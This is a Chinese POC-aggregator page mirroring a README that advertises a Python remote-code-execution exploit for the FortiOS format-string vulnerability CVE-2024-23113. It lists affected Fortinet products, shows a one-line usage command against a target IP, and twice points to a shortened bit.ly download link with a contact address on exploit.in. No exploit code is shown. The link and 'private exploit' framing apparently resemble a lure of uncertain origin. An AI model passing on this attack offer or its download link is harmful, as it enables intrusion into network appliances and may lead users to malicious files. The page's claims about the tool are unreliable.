POC详情: d7551e7a3cc5444cc3efc079a8a7621a90fe3a12

来源
关联漏洞
标题: Fortinet FortiOS 格式化字符串错误漏洞 (CVE-2024-23113)
描述:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS存在格式化字符串错误漏洞,该漏洞源于使用外部控制的格式字符串,允许攻击者通过特制数据包执行未经授权的代码或命令。
介绍
# FortiOS and FortiProxy Format String  Vulnerability to RCE (CVE-2024-23113)

## Overview
CVE-2024-23113
The vulnerability lies in the format string, and because of it and the .py exploit, an attacker can send RCE commands without having administrator rights. Confidentiality, integrity and availability are affected.

## Exploit:
### [Download here](https://bit.ly/3O8FoE7)

## Details

- **CVE ID**: [CVE-2024-23113](https://nvd.nist.gov/vuln/detail/CVE-2024-23113)
- **Published**: 2024-10-15
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8

## Vulnerability Description

It’s a Format String vulnerability, allows attacker to execute unauthorised code or commands via specially crafted packets.

The use of externally-controlled format string vulnerability [CWE-134] in FortiOS fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.
Allows attacker to execute unauthorized code or commands via specially crafted packets.
## Affected Versions

**Fortinet FortiOS versions**

7.4.0 through 7.4.2,
7.2.0 through 7.2.6,
7.0.0 through 7.0.13,

**FortiProxy versions**

7.4.0 through 7.4.2,
7.2.0 through 7.2.8,
7.0.0 through 7.0.14,

**FortiPAM versions**

1.2.0, 1.1.0 through 1.1.2,
1.0.0 through 1.0.3,

**FortiSwitchManager versions**

7.2.0 through 7.2.3,
7.0.0 through 7.0.3


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **expl0itsecurity@exploit.in**

## Exploit:
### [Download here](https://bit.ly/3O8FoE7)


![image](https://github.com/HazeLook/CVE-2024-23113/blob/main/CVE-2024-23113Hello.png)
文件快照

[4.0K] /data/pocs/d7551e7a3cc5444cc3efc079a8a7621a90fe3a12 └── [1.7K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。